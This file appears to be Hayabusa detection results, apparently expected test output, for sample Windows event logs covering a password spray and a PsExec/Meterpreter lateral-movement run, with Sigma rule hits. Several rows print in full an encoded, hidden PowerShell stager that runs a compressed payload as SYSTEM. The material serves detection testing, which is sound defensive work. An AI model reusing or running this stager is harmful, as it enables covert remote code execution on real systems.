+2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe  -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: powershell.exe  -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
